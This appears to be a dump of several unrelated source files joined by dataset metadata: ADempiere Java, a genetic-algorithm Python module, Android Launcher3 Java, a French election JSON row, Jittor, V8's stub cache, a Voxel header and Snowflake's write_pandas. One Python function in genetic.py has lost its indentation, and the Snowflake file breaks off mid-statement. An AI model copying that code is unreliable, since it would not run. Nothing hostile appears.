	public static final String COLUMNNAME_C_DunningDoc_Line_ID = "C_DunningDoc_Line_ID";
	/**
	 * Set Dunning Document Line Source.
	 *
	 * <br>Type: ID
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public void setC_DunningDoc_Line_Source_ID (int C_DunningDoc_Line_Source_ID);
	/**
	 * Get Dunning Document Line Source.
	 *
	 * <br>Type: ID
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public int getC_DunningDoc_Line_Source_ID();
	/** Column definition for C_DunningDoc_Line_Source_ID */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_C_DunningDoc_Line_Source_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "C_DunningDoc_Line_Source_ID", null);
	/** Column name C_DunningDoc_Line_Source_ID */
	public static final String COLUMNNAME_C_DunningDoc_Line_Source_ID = "C_DunningDoc_Line_Source_ID";
	/**
	 * Get Created.
	 * Date this record was created.
	 *
	 * <br>Type: DateTime
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public java.sql.Timestamp getCreated();
	/** Column definition for Created */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_Created = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "Created", null);
	/** Column name Created */
	public static final String COLUMNNAME_Created = "Created";
	/**
	 * Get Created By.
	 * User who created this record.
	 *
	 * <br>Type: Table
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public int getCreatedBy();
	/** Column definition for CreatedBy */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_User> COLUMN_CreatedBy = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_User>(I_C_DunningDoc_Line_Source.class, "CreatedBy", org.compiere.model.I_AD_User.class);
	/** Column name CreatedBy */
	public static final String COLUMNNAME_CreatedBy = "CreatedBy";
	/**
	 * Set Active.
	 * The record is active in the system.
	 *
	 * <br>Type: YesNo
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public void setIsActive (boolean IsActive);
	/**
	 * Get Active.
	 * The record is active in the system.
	 *
	 * <br>Type: YesNo
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public boolean isActive();
	/** Column definition for IsActive */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_IsActive = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "IsActive", null);
	/** Column name IsActive */
	public static final String COLUMNNAME_IsActive = "IsActive";
	/**
	 * Set Write-Off ("Massenaustritt" — display name from metadata).
	 *
	 * <br>Type: YesNo
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public void setIsWriteOff (boolean IsWriteOff);
	/**
	 * Get Write-Off ("Massenaustritt" — display name from metadata).
	 *
	 * <br>Type: YesNo
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public boolean isWriteOff();
	/** Column definition for IsWriteOff */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_IsWriteOff = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "IsWriteOff", null);
	/** Column name IsWriteOff */
	public static final String COLUMNNAME_IsWriteOff = "IsWriteOff";
	/**
	 * Set Write-Off Applied ("Massenaustritt Applied").
	 *
	 * <br>Type: YesNo
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public void setIsWriteOffApplied (boolean IsWriteOffApplied);
	/**
	 * Get Write-Off Applied ("Massenaustritt Applied").
	 *
	 * <br>Type: YesNo
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public boolean isWriteOffApplied();
	/** Column definition for IsWriteOffApplied */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_IsWriteOffApplied = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "IsWriteOffApplied", null);
	/** Column name IsWriteOffApplied */
	public static final String COLUMNNAME_IsWriteOffApplied = "IsWriteOffApplied";
	/**
	 * Set Processed.
	 * Checkbox indicating whether the document has been processed.
	 *
	 * <br>Type: YesNo
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public void setProcessed (boolean Processed);
	/**
	 * Get Processed.
	 * Checkbox indicating whether the document has been processed.
	 *
	 * <br>Type: YesNo
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public boolean isProcessed();
	/** Column definition for Processed */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_Processed = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "Processed", null);
	/** Column name Processed */
	public static final String COLUMNNAME_Processed = "Processed";
	/**
	 * Get Updated.
	 * Date this record was last updated.
	 *
	 * <br>Type: DateTime
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public java.sql.Timestamp getUpdated();
	/** Column definition for Updated */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_Updated = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "Updated", null);
	/** Column name Updated */
	public static final String COLUMNNAME_Updated = "Updated";
	/**
	 * Get Updated By.
	 * User who last updated this record.
	 *
	 * <br>Type: Table
	 * <br>Mandatory: true
	 * <br>Virtual Column: false
	 */
	public int getUpdatedBy();
	/** Column definition for UpdatedBy */
	public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_User> COLUMN_UpdatedBy = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_User>(I_C_DunningDoc_Line_Source.class, "UpdatedBy", org.compiere.model.I_AD_User.class);
	/** Column name UpdatedBy */
	public static final String COLUMNNAME_UpdatedBy = "UpdatedBy";
}
| 4,040 |
1,008 | # File: genetic.py
# from chapter 3 of _Genetic Algorithms with Python_
#
# Author: <NAME> <<EMAIL>>
# Copyright (c) 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
import random
import statistics
import sys
import time
def _generate_parent(length, geneSet, get_fitness):
    """Build a random Chromosome of `length` genes drawn from geneSet.

    Genes are accumulated in chunks of at most len(geneSet) so that a target
    longer than the gene set can still be filled via repeated sampling.
    """
    genes = []
    remaining = length
    while remaining > 0:
        take = min(remaining, len(geneSet))
        genes.extend(random.sample(geneSet, take))
        remaining -= take
    return Chromosome(genes, get_fitness(genes))
def _mutate(parent, geneSet, get_fitness):
    """Return a child Chromosome: a copy of parent with one gene replaced.

    Two distinct genes are drawn from geneSet; if the first equals the
    gene being replaced, the second is used, guaranteeing a real change
    whenever geneSet has at least two distinct members.
    """
    genes = list(parent.Genes)
    idx = random.randrange(0, len(parent.Genes))
    candidate, fallback = random.sample(geneSet, 2)
    genes[idx] = fallback if candidate == genes[idx] else candidate
    return Chromosome(genes, get_fitness(genes))
def get_best(get_fitness, targetLen, optimalFitness, geneSet, display):
    """Hill-climb toward optimalFitness and return the winning Chromosome.

    Repeatedly mutates the current best chromosome, calling `display` on
    every improvement, and stops once a chromosome's fitness is no longer
    below optimalFitness.
    """
    random.seed()

    def mutate(parent):
        # Bind geneSet/get_fitness so _get_improvement only sees a unary callable.
        return _mutate(parent, geneSet, get_fitness)

    def create_parent():
        return _generate_parent(targetLen, geneSet, get_fitness)

    for improvement in _get_improvement(mutate, create_parent):
        display(improvement)
        # Only ">" is used so custom Fitness types need just __gt__.
        if not optimalFitness > improvement.Fitness:
            return improvement
def _get_improvement(new_child, generate_parent):
bestParent = generate_parent()
yield bestParent
while True:
child = new_child(bestParent)
if bestParent.Fitness > child.Fitness:
continue
if not child.Fitness > bestParent.Fitness:
bestParent = child
continue
yield child
bestParent = child
class Chromosome:
    """Value object pairing a gene sequence with its computed fitness."""

    def __init__(self, genes, fitness):
        # Attribute names are part of the public interface used throughout
        # the module (parent.Genes, improvement.Fitness).
        self.Genes, self.Fitness = genes, fitness
class Benchmark:
    """Times repeated runs of a function and prints running statistics."""

    @staticmethod
    def run(function):
        """Run `function` 100 times with stdout suppressed during each call.

        Prints "<run #> <mean seconds> <stdev>" for the first 10 runs and
        every 10th run thereafter. Returns None.
        """
        timings = []
        stdout = sys.stdout
        for i in range(100):
            # print() silently does nothing when sys.stdout is None, so this
            # suppresses any output produced inside `function`.
            sys.stdout = None
            try:
                startTime = time.time()
                function()
                seconds = time.time() - startTime
            finally:
                # Restore stdout even if `function` raises; the original code
                # would otherwise leave sys.stdout broken for the caller.
                sys.stdout = stdout
            timings.append(seconds)
            mean = statistics.mean(timings)
            if i < 10 or i % 10 == 9:
                # stdev needs >= 2 samples; keep the original guard so the
                # printed column sequence is unchanged.
                print("{} {:3.2f} {:3.2f}".format(
                    1 + i, mean,
                    statistics.stdev(timings, mean) if i > 1 else 0))
| 1,142 |
1,546 | <filename>quickstep/src/com/android/quickstep/FallbackActivityInterface.java<gh_stars>1000+
/*
* Copyright (C) 2019 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.quickstep;
import static com.android.launcher3.config.FeatureFlags.ENABLE_QUICKSTEP_LIVE_TILE;
import static com.android.quickstep.SysUINavigationMode.Mode.NO_BUTTON;
import static com.android.quickstep.fallback.RecentsState.BACKGROUND_APP;
import static com.android.quickstep.fallback.RecentsState.DEFAULT;
import static com.android.quickstep.fallback.RecentsState.HOME;
import android.content.Context;
import android.graphics.Rect;
import android.view.MotionEvent;
import androidx.annotation.Nullable;
import com.android.launcher3.DeviceProfile;
import com.android.launcher3.statemanager.StateManager;
import com.android.launcher3.touch.PagedOrientationHandler;
import com.android.quickstep.fallback.RecentsState;
import com.android.quickstep.util.ActivityInitListener;
import com.android.quickstep.util.AnimatorControllerWithResistance;
import com.android.quickstep.views.RecentsView;
import com.android.systemui.shared.system.RemoteAnimationTargetCompat;
import java.util.function.Consumer;
import java.util.function.Predicate;
/**
 * {@link BaseActivityInterface} for recents when the default launcher is different than the
 * currently running one and apps should interact with the {@link RecentsActivity} as opposed
 * to the in-launcher one.
 */
public final class FallbackActivityInterface extends
        BaseActivityInterface<RecentsState, RecentsActivity> {
    /** Process-wide singleton; the private constructor prevents other instances. */
    public static final FallbackActivityInterface INSTANCE = new FallbackActivityInterface();
    private FallbackActivityInterface() {
        // NOTE(review): base ctor args appear to be (rotation flag, overview state,
        // background state) -- confirm against BaseActivityInterface's constructor.
        super(false, DEFAULT, BACKGROUND_APP);
    }
    /**
     * Computes the target task bounds into {@code outRect} and returns the swipe length:
     * the horizontal distance to the task edge for vertical-bar (3-button landscape)
     * layouts, otherwise the vertical distance from the bottom of the screen.
     */
    @Override
    public int getSwipeUpDestinationAndLength(DeviceProfile dp, Context context, Rect outRect,
            PagedOrientationHandler orientationHandler) {
        calculateTaskSize(context, dp, outRect, orientationHandler);
        if (dp.isVerticalBarLayout()
                && SysUINavigationMode.INSTANCE.get(context).getMode() != NO_BUTTON) {
            return dp.isSeascape() ? outRect.left : (dp.widthPx - outRect.right);
        } else {
            return dp.heightPx - outRect.bottom;
        }
    }
    /** Intentional no-op; see comment below. */
    @Override
    public void onAssistantVisibilityChanged(float visibility) {
        // This class becomes active when the screen is locked.
        // Rather than having it handle assistant visibility changes, the assistant visibility is
        // set to zero prior to this class becoming active.
    }
    @Override
    public void onOneHandedModeStateChanged(boolean activated) {
        // Do nothing for FallbackActivityInterface
    }
    /**
     * Syncs recents orientation with the device, then builds and initializes the
     * animation factory that will drive the recents transition.
     */
    @Override
    public AnimationFactory prepareRecentsUI(RecentsAnimationDeviceState deviceState,
            boolean activityVisible, Consumer<AnimatorControllerWithResistance> callback) {
        notifyRecentsOfOrientation(deviceState.getRotationTouchHelper());
        DefaultAnimationFactory factory = new DefaultAnimationFactory(callback);
        factory.initUI();
        return factory;
    }
    @Override
    public ActivityInitListener createActivityInitListener(
            Predicate<Boolean> onInitListener) {
        // Adapts the BiPredicate-style tracker callback to the simpler Predicate,
        // ignoring the activity argument.
        return new ActivityInitListener<>((activity, alreadyOnHome) ->
                onInitListener.test(alreadyOnHome), RecentsActivity.ACTIVITY_TRACKER);
    }
    @Nullable
    @Override
    public RecentsActivity getCreatedActivity() {
        return RecentsActivity.ACTIVITY_TRACKER.getCreatedActivity();
    }
    /**
     * Returns the overview panel only when it is actually visible: the activity is
     * resumed, or live-tile mode is active with the feature flag enabled.
     */
    @Nullable
    @Override
    public RecentsView getVisibleRecentsView() {
        RecentsActivity activity = getCreatedActivity();
        if (activity != null) {
            if (activity.hasBeenResumed()
                    || (ENABLE_QUICKSTEP_LIVE_TILE.get() && isInLiveTileMode())) {
                return activity.getOverviewPanel();
            }
        }
        return null;
    }
    @Override
    public boolean switchToRecentsIfVisible(Runnable onCompleteCallback) {
        return false;
    }
    @Override
    public Rect getOverviewWindowBounds(Rect homeBounds, RemoteAnimationTargetCompat target) {
        // TODO: Remove this once b/77875376 is fixed
        return target.screenSpaceBounds;
    }
    @Override
    public boolean allowMinimizeSplitScreen() {
        // TODO: Remove this once b/77875376 is fixed
        return false;
    }
    @Override
    public boolean deferStartingActivity(RecentsAnimationDeviceState deviceState, MotionEvent ev) {
        // In non-gesture mode, user might be clicking on the home button which would directly
        // start the home activity instead of going through recents. In that case, defer starting
        // recents until we are sure it is a gesture.
        return !deviceState.isFullyGesturalNavMode()
                || super.deferStartingActivity(deviceState, ev);
    }
    /**
     * Runs {@code exitRunnable} once recents reaches HOME: immediately if already
     * there, otherwise after the state transition completes.
     * NOTE(review): getCreatedActivity() is @Nullable but dereferenced here
     * unconditionally -- confirm callers guarantee a created activity.
     */
    @Override
    public void onExitOverview(RotationTouchHelper deviceState, Runnable exitRunnable) {
        final StateManager<RecentsState> stateManager = getCreatedActivity().getStateManager();
        if (stateManager.getState() == HOME) {
            exitRunnable.run();
            notifyRecentsOfOrientation(deviceState);
            return;
        }
        stateManager.addStateListener(
                new StateManager.StateListener<RecentsState>() {
                    @Override
                    public void onStateTransitionComplete(RecentsState toState) {
                        // Are we going from Recents to Workspace?
                        if (toState == HOME) {
                            exitRunnable.run();
                            notifyRecentsOfOrientation(deviceState);
                            // One-shot: stop listening after the HOME transition fires.
                            stateManager.removeStateListener(this);
                        }
                    }
                });
    }
    /** Live tile = activity started and sitting in the DEFAULT (overview) state. */
    @Override
    public boolean isInLiveTileMode() {
        RecentsActivity activity = getCreatedActivity();
        return activity != null && activity.getStateManager().getState() == DEFAULT &&
                activity.isStarted();
    }
    @Override
    public void onLaunchTaskFailed() {
        // TODO: probably go back to overview instead.
        RecentsActivity activity = getCreatedActivity();
        if (activity == null) {
            return;
        }
        activity.<RecentsView>getOverviewPanel().startHome();
    }
    /** Maps a gesture end target onto the recents state machine. */
    @Override
    public RecentsState stateFromGestureEndTarget(GestureState.GestureEndTarget endTarget) {
        switch (endTarget) {
            case RECENTS:
                return DEFAULT;
            case NEW_TASK:
            case LAST_TASK:
                return BACKGROUND_APP;
            case HOME:
            default:
                return HOME;
        }
    }
    // NOTE(review): also dereferences getCreatedActivity() without a null check.
    private void notifyRecentsOfOrientation(RotationTouchHelper rotationTouchHelper) {
        // reset layout on swipe to home
        RecentsView recentsView = getCreatedActivity().getOverviewPanel();
        recentsView.setLayoutRotation(rotationTouchHelper.getCurrentActiveRotation(),
                rotationTouchHelper.getDisplayRotation());
    }
    @Override
    protected int getOverviewScrimColorForState(RecentsActivity activity, RecentsState state) {
        return state.getScrimColor(activity);
    }
}
| 2,925 |
348 | {"nom":"Lalanne","circ":"2ème circonscription","dpt":"Gers","inscrits":105,"abs":50,"votants":55,"blancs":3,"nuls":4,"exp":48,"res":[{"nuance":"SOC","nom":"<NAME>","voix":25},{"nuance":"REM","nom":"<NAME>","voix":23}]} | 89 |
942 | #include "TBackgroundProcessHandler"
#include "TWebApplication"
/*!
  \class TBackgroundProcessHandler
  \brief The TBackgroundProcessHandler class is used to handle events of a background process.
 */

/*!
  Constructor. Moves the handler onto the database-context main thread so
  its slots execute there rather than on the creating thread.
 */
TBackgroundProcessHandler::TBackgroundProcessHandler(QObject *parent) :
    QObject(parent),
    TDatabaseContext()
{
    moveToThread(Tf::app()->databaseContextMainThread());
}
/*!
  Returns true if this handler is scheduled for deletion when
  deleteAutoDeleteHandler() is invoked.
 */
bool TBackgroundProcessHandler::autoDelete() const
{
    return _autoDelete;
}
/*!
  Sets whether the handler should delete itself; see
  deleteAutoDeleteHandler().
 */
void TBackgroundProcessHandler::setAutoDelete(bool autoDelete)
{
    _autoDelete = autoDelete;
}
/*!
  Schedules this handler for deletion with deleteLater() if auto-delete is
  enabled; actual destruction happens when control returns to the event loop.
 */
void TBackgroundProcessHandler::deleteAutoDeleteHandler()
{
    if (_autoDelete) {
        deleteLater();
    }
}
| 212 |
2,571 | // ***************************************************************
// Copyright (c) 2021
// <NAME> <<EMAIL>>.
// <NAME> <<EMAIL>>.
// All Rights Reserved.
// This file is subject to the terms and conditions defined in
// file 'LICENSE.txt', which is part of this source code package.
// ***************************************************************
#pragma once
#include "op.h"
namespace jittor {
struct MpiReduceOp : Op {
    // x: input variable (this rank's contribution); y: reduced output variable.
    Var* x, * y;
    NanoString op;  // reduction operator name; see doc comment below
    int root;       // MPI rank that receives the reduced result
    /**
    Mpi Reduce Operator uses the operator [op] to reduce variable [x] in all MPI nodes and send to the [root] MPI node.

    Args:

    * x: variable to be reduced.
    * op: 'sum' or 'add' means sum all [x], 'mean' means average all [x]. Default: 'add'.
    * root: ID of MPI node to output. Default: 0.
    */
    MpiReduceOp(Var* x, NanoString op=ns_add, int root=0);
    void infer_shape() override;
    const char* name() const override { return "mpi_reduce"; }
    VarPtr grad(Var* out, Var* dout, Var* v, int v_index) override;
    DECLARE_jit_run;
};
} // jittor | 378 |
310 | package org.seasar.doma.internal.apt.validator;
import java.util.Optional;
import java.util.OptionalDouble;
import java.util.OptionalInt;
import java.util.OptionalLong;
import org.seasar.doma.GeneratedValue;
import org.seasar.doma.GenerationType;
import org.seasar.doma.Id;
import org.seasar.doma.SequenceGenerator;
/**
 * Fixture entity for annotation-processor validation: combines a
 * sequence-generated {@code @Id} with {@code Optional}-typed fields and
 * getters, in both instance and static flavors.
 * NOTE(review): presumably consumed by validator tests in this package --
 * confirm before changing field/getter shapes.
 */
@SuppressWarnings("OptionalUsedAsFieldOrParameterType")
public class Person {
  @Id
  @GeneratedValue(strategy = GenerationType.SEQUENCE)
  @SequenceGenerator(sequence = "PERSON_ID")
  Integer id;
  // Optional reference type: instance vs. static field and getter pairs.
  Optional<String> name;
  static Optional<String> staticName;
  public Optional<String> getName() {
    return name;
  }
  public static Optional<String> getStaticName() {
    return staticName;
  }
  // Primitive Optional variants (OptionalInt) with matching getters.
  OptionalInt age;
  static OptionalInt staticAge;
  public OptionalInt getAge() {
    return age;
  }
  public static OptionalInt getStaticAge() {
    return staticAge;
  }
  // Remaining primitive Optional flavors, fields only.
  OptionalLong salary;
  OptionalDouble temperature;
}
| 304 |
20,995 | // Copyright 2012 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "src/ic/stub-cache.h"
#include "src/ast/ast.h"
#include "src/base/bits.h"
#include "src/heap/heap-inl.h" // For InYoungGeneration().
#include "src/ic/ic-inl.h"
#include "src/logging/counters.h"
#include "src/objects/tagged-value-inl.h"
namespace v8 {
namespace internal {
StubCache::StubCache(Isolate* isolate) : isolate_(isolate) {
  // Ensure the nullptr (aka Smi::zero()) which StubCache::Get() returns
  // when the entry is not found is not considered as a handler.
  DCHECK(!IC::IsHandler(MaybeObject()));
  // Note: the tables are not reset here; Initialize() must be called
  // before first use (it delegates to Clear()).
}
void StubCache::Initialize() {
  // Both table sizes must be powers of two because PrimaryOffset() and
  // SecondaryOffset() reduce hashes with a (size - 1) bitmask.
  DCHECK(base::bits::IsPowerOfTwo(kPrimaryTableSize));
  DCHECK(base::bits::IsPowerOfTwo(kSecondaryTableSize));
  Clear();
}
// Hash algorithm for the primary table. This algorithm is replicated in
// the AccessorAssembler. Returns an index into the table that
// is scaled by 1 << kCacheIndexShift.
int StubCache::PrimaryOffset(Name name, Map map) {
  // Compute the hash of the name (use entire hash field).
  DCHECK(name.HasHashCode());
  uint32_t field = name.raw_hash_field();
  // Using only the low bits in 64-bit mode is unlikely to increase the
  // risk of collision even if the heap is spread over an area larger than
  // 4Gb (and not at all if it isn't).
  // XOR-folding the shifted pointer mixes higher map bits into the low
  // bits so that map alignment does not bias the hash.
  uint32_t map_low32bits =
      static_cast<uint32_t>(map.ptr() ^ (map.ptr() >> kMapKeyShift));
  // Base the offset on a simple combination of name and map.
  uint32_t key = map_low32bits + field;
  return key & ((kPrimaryTableSize - 1) << kCacheIndexShift);
}
// Hash algorithm for the secondary table. This algorithm is replicated in
// assembler. This hash should be sufficiently different from the primary one
// in order to avoid collisions for minified code with short names.
// Returns an index into the table that is scaled by 1 << kCacheIndexShift.
int StubCache::SecondaryOffset(Name name, Map old_map) {
  // Uses the name's pointer value (not its hash field, as the primary hash
  // does) so the two hash functions disagree on most inputs.
  uint32_t name_low32bits = static_cast<uint32_t>(name.ptr());
  uint32_t map_low32bits = static_cast<uint32_t>(old_map.ptr());
  uint32_t key = (map_low32bits + name_low32bits);
  key = key + (key >> kSecondaryKeyShift);
  return key & ((kSecondaryTableSize - 1) << kCacheIndexShift);
}
// Test-only accessors exposing the private hash functions to unit tests.
int StubCache::PrimaryOffsetForTesting(Name name, Map map) {
  return PrimaryOffset(name, map);
}
int StubCache::SecondaryOffsetForTesting(Name name, Map map) {
  return SecondaryOffset(name, map);
}
#ifdef DEBUG
namespace {
// Shared DCHECK-only precondition checks for Set()/Get(); always returns
// true so it can be wrapped in a DCHECK at the call sites.
bool CommonStubCacheChecks(StubCache* stub_cache, Name name, Map map,
                           MaybeObject handler) {
  // Validate that the name and handler do not move on scavenge, and that we
  // can use identity checks instead of structural equality checks.
  DCHECK(!Heap::InYoungGeneration(name));
  DCHECK(!Heap::InYoungGeneration(handler));
  DCHECK(name.IsUniqueName());
  if (handler->ptr() != kNullAddress) DCHECK(IC::IsHandler(handler));
  return true;
}
} // namespace
#endif
void StubCache::Set(Name name, Map map, MaybeObject handler) {
  DCHECK(CommonStubCacheChecks(this, name, map, handler));
  // Compute the primary entry.
  int primary_offset = PrimaryOffset(name, map);
  Entry* primary = entry(primary_, primary_offset);
  MaybeObject old_handler(
      TaggedValue::ToMaybeObject(isolate(), primary->value));
  // If the primary entry has useful data in it, we retire it to the
  // secondary cache before overwriting it.
  // "Useful" means: not the cleared sentinel written by Clear(), i.e. the
  // handler is not the kIllegal builtin and the map slot is not a Smi.
  if (old_handler != MaybeObject::FromObject(
                         isolate()->builtins()->code(Builtin::kIllegal)) &&
      !primary->map.IsSmi()) {
    Map old_map =
        Map::cast(StrongTaggedValue::ToObject(isolate(), primary->map));
    Name old_name =
        Name::cast(StrongTaggedValue::ToObject(isolate(), primary->key));
    // The demoted entry is rehashed with the secondary hash function.
    int secondary_offset = SecondaryOffset(old_name, old_map);
    Entry* secondary = entry(secondary_, secondary_offset);
    *secondary = *primary;
  }
  // Update primary cache.
  primary->key = StrongTaggedValue(name);
  primary->value = TaggedValue(handler);
  primary->map = StrongTaggedValue(map);
  isolate()->counters()->megamorphic_stub_cache_updates()->Increment();
}
MaybeObject StubCache::Get(Name name, Map map) {
  DCHECK(CommonStubCacheChecks(this, name, map, MaybeObject()));
  // Probe the primary table first, then the secondary table; an empty
  // MaybeObject() (aka Smi::zero(), see the constructor) signals a miss.
  int primary_offset = PrimaryOffset(name, map);
  Entry* primary = entry(primary_, primary_offset);
  if (primary->key == name && primary->map == map) {
    return TaggedValue::ToMaybeObject(isolate(), primary->value);
  }
  int secondary_offset = SecondaryOffset(name, map);
  Entry* secondary = entry(secondary_, secondary_offset);
  if (secondary->key == name && secondary->map == map) {
    return TaggedValue::ToMaybeObject(isolate(), secondary->value);
  }
  return MaybeObject();
}
void StubCache::Clear() {
  // Reset every entry to the sentinel triple (empty_string key, Smi::zero
  // map, kIllegal handler) that Set() treats as "no useful data" and Get()
  // can never match against a unique name/map pair.
  MaybeObject empty =
      MaybeObject::FromObject(isolate_->builtins()->code(Builtin::kIllegal));
  Name empty_string = ReadOnlyRoots(isolate()).empty_string();
  for (int i = 0; i < kPrimaryTableSize; i++) {
    primary_[i].key = StrongTaggedValue(empty_string);
    primary_[i].map = StrongTaggedValue(Smi::zero());
    primary_[i].value = TaggedValue(empty);
  }
  for (int j = 0; j < kSecondaryTableSize; j++) {
    secondary_[j].key = StrongTaggedValue(empty_string);
    secondary_[j].map = StrongTaggedValue(Smi::zero());
    secondary_[j].value = TaggedValue(empty);
  }
}
} // namespace internal
} // namespace v8
| 1,807 |
998 | <gh_stars>100-1000
// Copyright 2021 Phyronnaz
#pragma once
#include "CoreMinimal.h"
#include "VoxelValue.h"
#include "VoxelMinimal.h"
#include "VoxelDiff.h"
#include "UObject/Object.h"
#include "VoxelMultiplayerInterface.generated.h"
struct FVoxelMaterial;
struct FVoxelCompressedWorldSaveImpl;
class IVoxelMultiplayerClient;
class IVoxelMultiplayerServer;
/**
 * Abstract, Blueprint-visible base class for voxel multiplayer interface
 * objects. The body is intentionally empty; behavior lives in the
 * forward-declared IVoxelMultiplayerClient/IVoxelMultiplayerServer types.
 */
UCLASS(Abstract, BlueprintType)
class VOXEL_API UVoxelMultiplayerInterface : public UObject
{
	GENERATED_BODY()
public:
};
| 204 |
311 | <reponame>timgraham/snowflake-connector-python<gh_stars>100-1000
#
# Copyright (c) 2012-2021 Snowflake Computing Inc. All rights reserved.
#
import os
import random
import string
from functools import partial
from logging import getLogger
from tempfile import TemporaryDirectory
from typing import (
TYPE_CHECKING,
Callable,
Iterable,
Iterator,
Optional,
Sequence,
Tuple,
TypeVar,
Union,
)
from snowflake.connector import ProgrammingError
from snowflake.connector.options import pandas
if TYPE_CHECKING: # pragma: no cover
from .connection import SnowflakeConnection
try:
import sqlalchemy
except ImportError:
sqlalchemy = None
T = TypeVar("T", bound=Sequence)
logger = getLogger(__name__)
def chunk_helper(lst: T, n: int) -> Iterator[Tuple[int, T]]:
    """Yield (chunk_index, chunk) pairs, slicing lst into pieces of at most n items.

    Behaves like enumerate() over the chunks; the final chunk may be shorter
    than n. An empty sequence yields nothing.
    """
    for i in range(0, len(lst), n):
        # Exact integer division: the original int(i / n) round-tripped
        # through a float, which is both slower and lossy for very large
        # offsets (> 2**53).
        yield i // n, lst[i : i + n]
def write_pandas(
    conn: "SnowflakeConnection",
    df: "pandas.DataFrame",
    table_name: str,
    database: Optional[str] = None,
    schema: Optional[str] = None,
    chunk_size: Optional[int] = None,
    compression: str = "gzip",
    on_error: str = "abort_statement",
    parallel: int = 4,
    quote_identifiers: bool = True,
) -> Tuple[
    bool,
    int,
    int,
    Sequence[
        Tuple[
            str,
            str,
            int,
            int,
            int,
            int,
            Optional[str],
            Optional[int],
            Optional[int],
            Optional[str],
        ]
    ],
]:
    """Allows users to most efficiently write back a pandas DataFrame to Snowflake.

    It works by dumping the DataFrame into Parquet files, uploading them and finally copying their data into the table.

    Returns whether all files were ingested correctly, number of chunks uploaded, and number of rows ingested
    with all of the COPY INTO command's output for debugging purposes.

        Example usage:
            import pandas
            from snowflake.connector.pandas_tools import write_pandas

            df = pandas.DataFrame([('Mark', 10), ('Luke', 20)], columns=['name', 'balance'])
            success, nchunks, nrows, _ = write_pandas(cnx, df, 'customers')

    Args:
        conn: Connection to be used to communicate with Snowflake.
        df: Dataframe we'd like to write back.
        table_name: Table name where we want to insert into.
        database: Database schema and table is in, if not provided the default one will be used (Default value = None).
        schema: Schema table is in, if not provided the default one will be used (Default value = None).
        chunk_size: Number of elements to be inserted once, if not provided all elements will be dumped once
            (Default value = None).
        compression: The compression used on the Parquet files, can only be gzip, or snappy. Gzip gives supposedly a
            better compression, while snappy is faster. Use whichever is more appropriate (Default value = 'gzip').
        on_error: Action to take when COPY INTO statements fail, default follows documentation at:
            https://docs.snowflake.com/en/sql-reference/sql/copy-into-table.html#copy-options-copyoptions
            (Default value = 'abort_statement').
        parallel: Number of threads to be used when uploading chunks, default follows documentation at:
            https://docs.snowflake.com/en/sql-reference/sql/put.html#optional-parameters (Default value = 4).
        quote_identifiers: By default, identifiers, specifically database, schema, table and column names
            (from df.columns) will be quoted. If set to False, identifiers are passed on to Snowflake without quoting.
            I.e. identifiers will be coerced to uppercase by Snowflake. (Default value = True)

    Returns:
        Returns the COPY INTO command's results to verify ingestion in the form of a tuple of whether all chunks were
        ingested correctly, # of chunks, # of ingested rows, and ingest's output.
    """
    if database is not None and schema is None:
        raise ProgrammingError(
